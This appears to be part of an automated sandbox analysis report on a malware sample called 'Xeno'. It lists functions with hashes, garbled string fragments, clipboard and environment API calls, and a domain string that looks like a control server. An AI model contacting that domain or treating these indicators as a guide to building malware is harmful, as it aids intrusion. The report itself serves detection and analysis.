                            • String ID: "$"$"$#$#$$$&$($*$*$*$*$,$,$-$-$/$/$1$1$1$2$2$3$3$3$4$4$4$48DD14122033DD2BC61BA3BAD8862B62$5$6$6$6$7$7$7$7$<$<$=$>$>$>$>$>$?$@$B$C$C$D$D$F$H$J$J$K$K$L$L$L$N$O$O$O$P$P$Q$R$R$R$T$T$T$T$V$X$X$Z$Z$Z$[$\$\$^$`$b$d$d$f$h$j$l$n$p$r$s$sobrattyeu.bond$t$u$v$x$z$|$~
                            • API String ID: 0-3897458280
                            • Opcode ID: 7a804a1a2148a722f5c9f87b710d1aaa97649f1d123968ff1145dbbe65e20771
                            • Instruction ID: 8a0841de800e6ad95827567054b00ad942a8976767375d9518dd06aae180d168
                            • Opcode Fuzzy Hash: 7a804a1a2148a722f5c9f87b710d1aaa97649f1d123968ff1145dbbe65e20771
                            • Instruction Fuzzy Hash: D932F2209087E98DDB32C67C8C587DDBFB15B63314F1843D9D0E86B2D2D6B90A85CB66
                            Function 0041C830 Relevance: 92.5, Strings: 73, Instructions: 1263COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$"$#$#$$$($*$,$,$,$.$0$1$1$1$2$3$3$3$3$4$6$:$:$:$;$<$B$C$C$H$H$K$K$O$P$T$U$U$W$X$Y$Y$Z$^$_$`$`$c$e$f$g$i$i$j$l$l$m$n$n$q$q$s$s$t$u$u$v$v$w$y${$}
                            • API String ID: 0-4217477181
                            • Opcode ID: 2fe2b5dcc309c7f032d11c7676046640cb2a811eda52af8db404590c91244872
                            • Instruction ID: 0d631b6e0bad6882a86c37c78288a67545caacf28bc4ca2141decf8a711f4690
                            • Opcode Fuzzy Hash: 2fe2b5dcc309c7f032d11c7676046640cb2a811eda52af8db404590c91244872
                            • Instruction Fuzzy Hash: B9B2BF71A0C7C18BC3258A3C884439FBBD16BD6324F194B6DE4E9873D2D6789845C797
                            Function 00438633 Relevance: 86.6, Strings: 69, Instructions: 378COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$+$+$.$/$2$2$3$4$6$7$8$8$9$;$<$>$@$@$B$B$D$F$G$H$J$L$M$N$O$P$R$T$T$V$W$X$Z$Z$\$]$^$`$a$b$c$d$e$f$g$h$j$k$l$n$o$p$r$s$t$v$x$x$y$z$|$}$~
                            • API String ID: 0-2166590413
                            • Opcode ID: 316f83764fdfa2307027b3b6d8fc1e52c897dd7cb484d367259af1444604bdd9
                            • Instruction ID: 28cf5dfb86c9a20de154088ad24fe8391ac7c7904c8b7326ded3421dfb4ae9d0
                            • Opcode Fuzzy Hash: 316f83764fdfa2307027b3b6d8fc1e52c897dd7cb484d367259af1444604bdd9
                            • Instruction Fuzzy Hash: 78221F219087E989DB32C63C8C447DDBEA15B67324F0843D9D1EC6B2D2C7B50B85DB66
                            Function 00425099 Relevance: 29.8, Strings: 23, Instructions: 1088COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 'u!w$)aB$*];_$,A=C$0a6c$1v?t$2z%x$5e5g$=i)k$G9\;$Kn5l$S1W3$X5g7$f1^3$j=i?$x[ $y9l;$|)t+$|-B/$3=$71$qs$y{
                            • API String ID: 0-3697304203
                            • Opcode ID: aa3492956efd5b5790a695c69ee8b2088feb2858c41bb82eaee84c983e3f0ddc
                            • Instruction ID: 28e714bd50e10af8c41feb94186a0781495570034c91797f689588b73619f2fc
                            • Opcode Fuzzy Hash: aa3492956efd5b5790a695c69ee8b2088feb2858c41bb82eaee84c983e3f0ddc
                            • Instruction Fuzzy Hash: 3F9212B5A10721CFD714CF25D8806AABBB2FF45314F6985ADC489AF352D735A842CF84
                            Function 00439770 Relevance: 16.5, Strings: 13, Instructions: 256COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$($2$4$6$7$<$L$N$\$a$d$z
                            • API String ID: 0-2675021843
                            • Opcode ID: 217042fcf425bca7ba762c0f0974a15efb2fa7f1c1b3472706f50882f844bc11
                            • Instruction ID: 8b0d74af031e13d7082c1fae75525c50212d23be6f38d7ab49b51dbc2e085af0
                            • Opcode Fuzzy Hash: 217042fcf425bca7ba762c0f0974a15efb2fa7f1c1b3472706f50882f844bc11
                            • Instruction Fuzzy Hash: BF91142260C7D14AD305997C884425FBFD20BE7224F1DCAAEE5E6873C2D5B9C90683A7
                            Function 00410E2B Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 510COMMON
                            Download Yara Rule
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL ref: 00410FEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: !$'$+$6$Z$n$t
                            • API String ID: 237503144-9893819
                            • Opcode ID: 99f6ccfbe35bece81bf8a630c8f55093e9e890b477979113cb74e8cdd48fc24d
                            • Instruction ID: 1d2933176acbf6399ddc32c77989705dfc4d090ef2e3c7131547c07c8bef2784
                            • Opcode Fuzzy Hash: 99f6ccfbe35bece81bf8a630c8f55093e9e890b477979113cb74e8cdd48fc24d
                            • Instruction Fuzzy Hash: 4712A27160C7908BC7249B38C4943EFBBE1AB89314F144A2FE9DA973D1D6788981CB47
                            Function 00415901 Relevance: 13.9, Strings: 10, Instructions: 1413COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 7$AE$D$Ip$OL$f$gfff$v$|E$~w
                            • API String ID: 0-2396867168
                            • Opcode ID: f6f123537915368f7177c65015ead87f293cc8620350017853b9ef37f0bbd50b
                            • Instruction ID: f650164397a1220ce77ee837e10c64e87231783d33de7ca0420ad25b9b007bcd
                            • Opcode Fuzzy Hash: f6f123537915368f7177c65015ead87f293cc8620350017853b9ef37f0bbd50b
                            • Instruction Fuzzy Hash: 01922575618300CFD724CF25D8917ABB7E1FF86314F598A2DE4998B2A1D738D842CB4A
                            Function 00416B82 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 831COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$J$M/($PkA$wt
                            • API String ID: 0-2150325240
                            • Opcode ID: 3cdbd5a59f1c456c57d50944254b0a9e2aee2dcf55ad76d546f3a653779b7b43
                            • Instruction ID: 2097e0ab478c5fb4104a198792983df039d6735c805d827ece3f1349a6c07896
                            • Opcode Fuzzy Hash: 3cdbd5a59f1c456c57d50944254b0a9e2aee2dcf55ad76d546f3a653779b7b43
                            • Instruction Fuzzy Hash: 39325B75A083508BD7248F28C8917EBB7E2EFD9324F194A7DE4C587395D7388941C786
                            Function 00437D15 Relevance: 12.8, Strings: 10, Instructions: 279COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$<$>$B$F$I$Q$kpq&$x$}
                            • API String ID: 0-3952396715
                            • Opcode ID: 24fb717b1005c24b2e204ef3df6c93f35e97be681929674b6f42489830c341fd
                            • Instruction ID: fa258679975c06a915c49adcd9c3571f8da54193e14a857b2c601fadba84c631
                            • Opcode Fuzzy Hash: 24fb717b1005c24b2e204ef3df6c93f35e97be681929674b6f42489830c341fd
                            • Instruction Fuzzy Hash: E9D1A2219087DA8ECB22C6BC88442CDBFB15F67330F194399E4F46B3E6D7644946C7A6
                            Function 00435030 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113clipboardCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                            • String ID: R
                            • API String ID: 1006321803-1466425173
                            • Opcode ID: b51a5d9e1f15048acf04de68c8079ef9c4ac5b682592d698e570beb2a0dddd99
                            • Instruction ID: 6c790f0c14f3510c170d12d6fa22ba9d8295c45850264baa4e5968bad997c9f4
                            • Opcode Fuzzy Hash: b51a5d9e1f15048acf04de68c8079ef9c4ac5b682592d698e570beb2a0dddd99
                            • Instruction Fuzzy Hash: 8A41C37150CB828FD301AF7C988831FBFE09B96324F094A6EE4D5962D2D7388649C797
                            Function 004408D0 Relevance: 10.1, Strings: 8, Instructions: 149COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$@$B$C$D$`$a$f
                            • API String ID: 0-3902758071
                            • Opcode ID: 8431bc05fbf4ae2a68e58cf0a730e60343e0988a62d7242d3f6638b5474ef362
                            • Instruction ID: 85993dc0967d8f3cbc0d6d8a434c450468ced68532d23729f38dca8b84427bf1
                            • Opcode Fuzzy Hash: 8431bc05fbf4ae2a68e58cf0a730e60343e0988a62d7242d3f6638b5474ef362
                            • Instruction Fuzzy Hash: CF511733A0C7A04BE3058938884535BBAC25BE5314F0DCA7EE9D9973C2D6BD8D1683D6
                            Function 00418700 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 873COMMON
                            Download Yara Rule
                            APIs
                            • FreeLibrary.KERNEL32(?), ref: 00418B37
                            • FreeLibrary.KERNEL32(?), ref: 00418B79
                              • Part of subcall function 0043E7C0: LdrInitializeThunk.NTDLL(0044184E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043E7EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeLibrary$InitializeThunk
                            • String ID: T0J$c`$pv
                            • API String ID: 764372645-1959182718
                            • Opcode ID: 40549d168b9b23683bea20ea7d3f8df14ed0ef22f9af7c7413b0adf457a3f8db
                            • Instruction ID: f6a5aba9ea7ab9b0fda9a98a556fa895e4c0b3dcf583012df9e209da60cbbcf9
                            • Opcode Fuzzy Hash: 40549d168b9b23683bea20ea7d3f8df14ed0ef22f9af7c7413b0adf457a3f8db
                            • Instruction Fuzzy Hash: 1E523774608300ABE7148F25DC54BABBBE2EBD5714F148A1DF494473E1D7399C82DB4A
                            Function 00414C04 Relevance: 9.4, Strings: 7, Instructions: 685COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: &,&#$;$C?1*$N$p$v8*+$VA
                            • API String ID: 0-127065759
                            • Opcode ID: 2949d67034982d41a1c3e2afaf1c9e6be2eeaa788f870a18e9070060a5a47fc7
                            • Instruction ID: 06f18023531571a2c868254a084415e26137606e72cc660c0f441ffb9a456cf5
                            • Opcode Fuzzy Hash: 2949d67034982d41a1c3e2afaf1c9e6be2eeaa788f870a18e9070060a5a47fc7
                            • Instruction Fuzzy Hash: D02217B6A08741CFD7248F25D8912EBB7E2EFC5314F19893EE49987351E7389841CB86
                            Function 00429FB0 Relevance: 9.2, Strings: 7, Instructions: 490COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: /$.$T$t$t$x$}
                            • API String ID: 0-1906187332
                            • Opcode ID: 5a46cd9993cf41d9b4c1f09c6a09eb63b67ffef489384db942ac5ac67120cb7d
                            • Instruction ID: 6f5c6ecd064ac2349477fe736486ae4bec1a54f2304a3953b2cc53b43e76de3f
                            • Opcode Fuzzy Hash: 5a46cd9993cf41d9b4c1f09c6a09eb63b67ffef489384db942ac5ac67120cb7d
                            • Instruction Fuzzy Hash: 5EF1347560C3808FD3109F39E88062BBBE2AF86314F984A6DF49547392D77A9D19CB17
                            Function 004174FD Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 333COMMON
                            Download Yara Rule
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004177FF
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: 7yA$u$^\
                            • API String ID: 237503144-2922194826
                            • Opcode ID: 246a1d4c6e25efb89ba2d3e171abe6c0b02338a9fcd4db2d919464085a321d5c
                            • Instruction ID: e6eb004f53d8726aea76ffd0efd70be5f0a3a6f1dbfce08b5db5ba1f2a6648eb
                            • Opcode Fuzzy Hash: 246a1d4c6e25efb89ba2d3e171abe6c0b02338a9fcd4db2d919464085a321d5c
                            • Instruction Fuzzy Hash: 3AC1F1756083518BC714CF28C8D17ABB7F1EF99364F184A2EE8C58B3A1E7389941CB56
                            Function 0040C7B5 Relevance: 8.0, Strings: 6, Instructions: 547COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: z0F$ ;45$sobrattyeu.bond$vw$WQ$[U
                            • API String ID: 0-784738450
                            • Opcode ID: 780b9195aa5403699f9e55c46d47cbdf45db762263f6f7f3a616397b55b141c1
                            • Instruction ID: cc3ba95a67fe0048f7f2a03910913153944ac2691b8f4269222efab85973a066
                            • Opcode Fuzzy Hash: 780b9195aa5403699f9e55c46d47cbdf45db762263f6f7f3a616397b55b141c1
                            • Instruction Fuzzy Hash: 20F1DDB414C3C18ED3758F25D095BEFBBE1EB92304F288A6EC4D96B292C7394506CB56
                            Function 00429D10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                            Download Yara Rule
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429E10
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00429E70
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: S4j*$t(E.
                            • API String ID: 237503144-2453282489
                            • Opcode ID: 8b9fabb23ceea281e1ce8d5ba9b8f075d64ae37bf022b25a4c02ecccabee8d94
                            • Instruction ID: 440ce7e223d083bc5d9a0788336fb0847d9c4af22d6ea4fa372daf1b325f59fc
                            • Opcode Fuzzy Hash: 8b9fabb23ceea281e1ce8d5ba9b8f075d64ae37bf022b25a4c02ecccabee8d94
                            • Instruction Fuzzy Hash: 9B4105B5A093509FE7248F21ED80B5BBBE4FB82704F40193DF6868B282CA75D805CB56
                            Function 0043D6A0 Relevance: 6.9, Strings: 5, Instructions: 642COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: S"(w$S"(w$`arc$f$i
                            • API String ID: 2994545307-3652705389
                            • Opcode ID: 3cf27f24d4a54fa8d9494d706c2cbceca3e228fec9bc6dc266a8f4799155dff1
                            • Instruction ID: 5afaf82e76ffb23cdac656c9cf2c4008b2c7e3162a0f634099996b4415f043f0
                            • Opcode Fuzzy Hash: 3cf27f24d4a54fa8d9494d706c2cbceca3e228fec9bc6dc266a8f4799155dff1
                            • Instruction Fuzzy Hash: 80222771A083418FC714CF29D88062BBBE1FB99314F189A2EF4A59B391D778DD05CB96
                            Function 004093E0 Relevance: 6.7, Strings: 5, Instructions: 405COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: *42*$*42*$48DD14122033DD2BC61BA3BAD8862B62$@$S
                            • API String ID: 0-2218147639
                            • Opcode ID: cb33ff30cab87ea4efb279c8c58357c0d2a873310e5c54f995e9bfd1604666a8
                            • Instruction ID: b8117d0a28365a8dfbe96da3ef135e85e26fd6f3d8799e4bd6085a01cfbbe0c6
                            • Opcode Fuzzy Hash: cb33ff30cab87ea4efb279c8c58357c0d2a873310e5c54f995e9bfd1604666a8
                            • Instruction Fuzzy Hash: 11C125B560C3408BD718DF35D89166BBBE6EBC1304F18497EE4D58B382DA39C90ACB56
                            Function 00401040 Relevance: 5.6, Strings: 4, Instructions: 602COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: false$null$p~@$true
                            • API String ID: 0-1622223765
                            • Opcode ID: 0367202998be23f014bce7dcf4411251309bd5fa7ca7e4a417d40a46cb8a3e39
                            • Instruction ID: 7fa1c42d2f3a66576c307c4d8d93a52f7f4fac08dacd1534b97285e0529143c4
                            • Opcode Fuzzy Hash: 0367202998be23f014bce7dcf4411251309bd5fa7ca7e4a417d40a46cb8a3e39
                            • Instruction Fuzzy Hash: 7012F1B49043059BE7105F21EC41B277AA4AF41348F19443EE9C6AB3F2EB3DE954CB5A
                            Function 004208E0 Relevance: 5.4, Strings: 4, Instructions: 428COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ijk$L X$` X$
                            • API String ID: 0-1070671204
                            • Opcode ID: 8d5b616ccd3d70c898108f1295d10eab4249a091f6025fc3787dffea44c2899a
                            • Instruction ID: e07ee844c3a263f85f7665288f57badada396a9b121fcadee848a62c4a63fb5b
                            • Opcode Fuzzy Hash: 8d5b616ccd3d70c898108f1295d10eab4249a091f6025fc3787dffea44c2899a
                            • Instruction Fuzzy Hash: 2CC1D1B16183108FD724CF29D891A6BBBF1FF86314F04892DE9868B391E779D805CB56
                            Function 004291C3 Relevance: 5.3, Strings: 4, Instructions: 311COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: :8>-$<;.%$Q$u!7=
                            • API String ID: 0-1236289958
                            • Opcode ID: f30878b6a4858dec0a2e971e688c54f4981c5af04d167c191633d82cf57404de
                            • Instruction ID: 08bec31c0f4dd7c03ede65b1caf782a16398cf1298081f2d1e44ee542996923b
                            • Opcode Fuzzy Hash: f30878b6a4858dec0a2e971e688c54f4981c5af04d167c191633d82cf57404de
                            • Instruction Fuzzy Hash: B1A132B6A083109FC714DF24D85166BB7E2EFD6304F48896DE4D68B391E738AD05CB4A
                            Function 0041E140 Relevance: 4.5, Strings: 3, Instructions: 719COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: A$yA$A
                            • API String ID: 0-525130035
                            • Opcode ID: c3f727362d8667d436ad01c94678ead0bca53e98b03f70e706ad55faedc9c487
                            • Instruction ID: f4d044325e820aa283e3d2a05993691b89dc021c5038b5178d9d372ebd677015
                            • Opcode Fuzzy Hash: c3f727362d8667d436ad01c94678ead0bca53e98b03f70e706ad55faedc9c487
                            • Instruction Fuzzy Hash: 76626DB0608F818FD3298F3C8855797BFD5AB5A324F184B5DA0FA873D2C77564018B6A
                            Function 0040A610 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,$By${y
                            • API String ID: 0-1802238924
                            • Opcode ID: edf2ca160de9f5fd84b543cf716bed5a632c8705a25df2e8bdddd86990b4ecf0
                            • Instruction ID: 655acd501e1d7c7bb4de0b24453b14ecbb1d84a7eaee0c2b2df6b5681a14dfd8
                            • Opcode Fuzzy Hash: edf2ca160de9f5fd84b543cf716bed5a632c8705a25df2e8bdddd86990b4ecf0
                            • Instruction Fuzzy Hash: 8DC127713483518BC325DE1884816ABBBE2EBD2704F18883DD4D16B386D679C91FDB97
                            Function 004268B2 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: JF$qv$|z
                            • API String ID: 0-561897946
                            • Opcode ID: b299a7b515a74c979f3fd422fa578213326ae42fdb22a80657d9428658ce2c21
                            • Instruction ID: 22d5c571a2ac7aede9346139aecc838d85eca5575369957d4de6705c9554004a
                            • Opcode Fuzzy Hash: b299a7b515a74c979f3fd422fa578213326ae42fdb22a80657d9428658ce2c21
                            • Instruction Fuzzy Hash: FDC1EDB4618390CFE3248F25E84076BBBE1FBC6304F55492DE5C99B291D774A805CB5B
                            Function 00411577 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1$f$}
                            • API String ID: 0-3862234615
                            • Opcode ID: f592de7bbe46ec1f67406ce58b75c6966565d870a1c725579df15070b39435d2
                            • Instruction ID: c34b1a5a124b5ef1578c07ea1b4e43cc779c3d7466038b1024325422850a1a27
                            • Opcode Fuzzy Hash: f592de7bbe46ec1f67406ce58b75c6966565d870a1c725579df15070b39435d2
                            • Instruction Fuzzy Hash: 12A10872A0D7408BC758AB3984812AFFBD25FC5324F198B2FE4E9973D1DA3885428747
                            Function 0041B571 Relevance: 4.0, Strings: 3, Instructions: 204COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dj 6$xj 6$TZ
                            • API String ID: 0-3647110430
                            • Opcode ID: bcbfe4d58ed1d171df67d66486e11a9aa749ce79f2fe901e7943871f3a12fb7e
                            • Instruction ID: 72569dd730581e9f35e6bfb91f95e06f3f7fc9e887c83017d5111127008db0c6
                            • Opcode Fuzzy Hash: bcbfe4d58ed1d171df67d66486e11a9aa749ce79f2fe901e7943871f3a12fb7e
                            • Instruction Fuzzy Hash: D751D0B160C3609BD7209F25D81166BBBF1EFDA318F18896DE4D54B391E3399901CB8B
